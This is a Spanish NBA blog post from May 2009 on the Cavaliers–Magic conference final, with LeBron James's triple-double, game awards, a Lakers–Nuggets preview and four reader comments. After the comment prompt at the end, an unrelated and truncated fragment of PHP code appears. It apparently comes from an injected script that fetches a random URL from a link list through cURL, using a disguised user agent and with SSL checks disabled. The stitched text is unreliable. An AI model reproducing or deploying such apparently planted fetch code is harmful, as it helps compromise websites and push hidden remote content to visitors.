Playoffs (28/05/2009): LeBron Salvation

29 de May de 2009 por TheDeerHunter

Hay que asumirlo. No será fácil que veamos el “esperado” gran duelo final The Chosen One vs Black Mamba. Con los antecedentes en la mano, hay menos de un 4% de probabilidades de que suceda. De 190 eliminatorias en situación de 3-1 sólo 8 se han resuelto con remontada. Campeonísimos como los Celtics de Russell&Havlicek, o los de Bird, McHale y Parish; los Lakers de Chamberlain&Bailor; los Rockets de Olajuwon; los Bullets de Elvin Hayes; los últimos Pistons del anillo; los Suns de Nash y los Heat de Mourning&Hardaway son los que lo han logrado. Sólo con enumerarlos se nos ponen los pelos como escarpias, pero si hay un nombre que no chirriaría en esa lista es, sin duda, el del Elegido.

Debe de ser algo psicológico pero nos resulta complicado augurar su probable eliminación. ¿Y por qué no va a poder ganar el próximo partido? La eliminatoria ha sido prácticamente una lotería desde el primer momento. Cierto. No podemos saber cómo va a terminar esto, pero de lo que podemos estar seguros es que hay UNO que no va a hincar la rodilla. Viste el #23 para más señas…

LeBron es la máquina perfecta, venida del futuro para exterminar las esperanzas de cualquier humano que no sea él de lograr el anillo. Será este año o alguno de los siguientes pero el reloj avanza inexorablemente hacia ese momento. Lo suyo no es normal y así lo demuestra el triple doble bestial que se marcó anoche. Qué bien mueve los hilos Stern, dios.

Pero es que anoche no estuvo sólo. Williams y Gibson por fin abrieron la lata. 9 triples entre ambos… de 13 intentos. Cuidadito. Ilgauskas, West, Varejao y Wallace trabajaron a destajo. ¿Pero por qué no aparece Joe Smith en esta eliminatoria?

Pero con los Cavaliers en momento dulce, Orlando dio claros signos de peligrosidad, neutralizando otra vez una ventaja de 22 puntos con facilidad pasmosa en el 2º cuarto. Ya es raro que los Cavs no se pusieran histéricos por el mazazo. Mal Rashard, mal Alston y Howard eliminado por faltas… Faltó un punto de tensión y concentración, por otro lado lógico, pero dieron guerra hasta casi el final. Ocasión perdida que Cleveland agradece.

Ahora se la juegan. El universo se concentra en un solo partido. No existe nada más allá.

PREMIOS

MVP: Obvio. 37 puntos, 14 rebotes y 12 asistencias. Números que no se ven todos los días y menos en un partido de Playoffs. Números al alcance de unos pocos. Números de LeBron James.

Sorpresa: Por fin el escudero de LeBron se dignó a aparecer en la serie. Mo Williams se fue a los 24 puntos con 6 triples y resultó una seria amenaza en el juego ofensivo de los Cavs.

Decepción: Tras el buen partido que cuajó hace 2 noches, ayer Rafer Alston nos dio la de cal. 3 puntitos con 1 de 10 en tiros. Con él en pista los Magic perdieron por 20 puntos.

Esfuerzo en vano: Hedo Turkoglu anotó 29 puntos pero se quedó sólo en 2 asistencias. En todo caso fue el más destacado de su equipo.

RAZONES PARA TRASNOCHAR

Primer match-ball para los Lakers pero en el Pepsi Center. Los amarillos deberán jugar extremadamente concentrados todo el partido y Kobe y Gasol deberán recibir como mínimo la misma ayuda de sus compañeros que en el anterior partido si quieren asaltar el pabellón de los Nuggets. Los Billups, Carmelo, Nene, Andersen, etc. no se lo pondrán nada fácil. A partir de las 3h00, hora española, y televisado por Cuatro en directo.

Comenta

4 comentarios a esta entrada

  1. Txusma dice:
    #1

    Esto es como el triplete del Barça. Creo que pasarán varios años hasta que valoremos la grandeza de lo que está haciendo LeBron día tras día y partido tras partido. Eso sí, debería llegar un anillo y no está nada claro que este sea el año, pero como los Cavs consigan remontar con LeBron como lider…

      Citar

  2. couxe dice:
    #2

    Jugando así se llevará algún anillo sí o sí… tal vez no sea este año, aunque yo creo que si consiguen igualar la eliminatoria en el próximo partido pasan casi seguro y serían los grandísimos favoritos al anillo, pero a sus sólo 24 todavía tiene por delante la hostia de años para incluso mejorar las bestialidades que ahora mismo está haciendo…

    Yo creo que si el físico le respeta, termirá su carrera en un nivel de dominio sobre la liga que sólo será igualado o superado por el de Jordan… Aunque dada su forma de jugar, me parece complicado que mantenga muchos años más el espectacular físico que mantiene ahora…

      Citar

  3. ÑBA dice:
    #3

    41 puntos está promediando el angelito en una final de Conferencia…

    Eso sí, el ataque de los Cavs más predecible no puede ser, pero le metió un par de tiros ‘in your face’ al pobre Pietrus que son indefendibles.

    Quien vaya con más hambre al 6º partido se lo llevará…

      Citar

  4. Jabho dice:
    #4

    Tremendo LeBron pero es cierto que a veces convierte el ataque de los Cavs en demasiado predecible…. Durísimo partido en Orlando seguro y la clave es que los Cavs sujeten a Howard.

    Ojo a Gibson. Parece tocado por esa gracia de los Horry, Kerr y similares, de intrascendente en partidos de menor importancia pero siempre anotan los tiros “calientes”…

    Sigo aportando por los Cavs.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>